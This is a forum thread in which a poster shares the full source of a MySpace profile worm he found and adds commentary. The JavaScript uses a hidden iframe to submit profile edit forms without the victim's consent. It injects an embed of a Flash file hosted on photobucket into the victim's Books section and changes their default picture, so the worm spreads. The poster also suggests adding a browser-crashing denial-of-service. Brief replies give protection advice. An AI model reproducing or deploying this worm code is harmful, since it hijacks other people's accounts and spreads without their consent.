MySpace owned.. again?...

We may earn a small commission from affiliate links and paid advertisements. Terms

VTECin5th

Administrator
So, i was looking at a friend's profile, and my picture was set to some gay white kid pointing or somethin, i thought hmm that was weird... so i sourced the page.
Didn't see anything weird offhand... then a few minutes later i realized what was going on.
I won't say how the call is being made, but i have the source code to the new myspace 'problem?', very similar to my methods, so i'm thinking it will probably die soon.
Maybe not though, since they didn't fix anything last time, just made more people interested in how to get around their crappy filtering.
Now i'm going to go try a couple things :laugh:
BTW: if you get infected, it's in the "Books" section.
Code:
<script>var pageId = 0;function ld(){if(pageId==0){frames['dynFrame'].location.href = 'http://editprofile.myspace.com/index.cfm?fuseaction=profile.interests';pageId++;}};function onFrameLoad(){if(frames['dynFrame']==null) return;if(pageId==1) { frames['dynFrame'].editInterest('books');pageId++;}else if(pageId==2) {frames['dynFrame'].document.forms[1].submit();pageId++;}else if(pageId == 3) { frames['dynFrame'].document.forms[1].interest.value = '<embed src=\"http://photobucket.com/albums/d110/pimpinainteasypl/alig.swf\" width=\"0\" height=\"0\" type=\"application/x-shockwave-flash\"></embed>';frames['dynFrame'].document.forms[1].submit();pageId++;}else if(pageId == 4) {frames['dynFrame'].location.href = 'http://editprofile.myspace.com/index.cfm?fuseaction=user.uploadphoto';pageId++;}
else if(pageId==5) { frames['dynFrame'].document.forms[1].imageID.value = '280225360';frames['dynFrame'].document.forms[1].C.name = 'setDefault';frames['dynFrame'].document.forms[1].C.value = '-Set as default-';frames['dynFrame'].document.forms[1].C.click(); pageId++;}}</script></head><body><iframe id="dynFrame"onLoad="onFrameLoad()"name="dynFrame"src=""width="0"></iframe><script>ld()</script>

Changes your default image, then embeds the worm in your profile.
The worm feeds off photobucket and flash.
The thing is, if people were smart they'd also embed the FireFox "0day" DoS into the page, so at least FF browsers would crash and die.
:)

Quoted post[/post]]
The thing is, if people were smart they'd also embed the FireFox "0day" DoS into the page, so at least FF browsers would crash and die.

SO what do i do to make sure phreakers like yourself dont destroy my myspace account lol?

Quoted post[/post]]
Quoted post[/post]]

SO what do i do to make sure phreakers like yourself dont destroy my myspace account lol?
Delete your myspace account.. or
Use FireFox, turn off JS
phreakers deal with phones lol

Back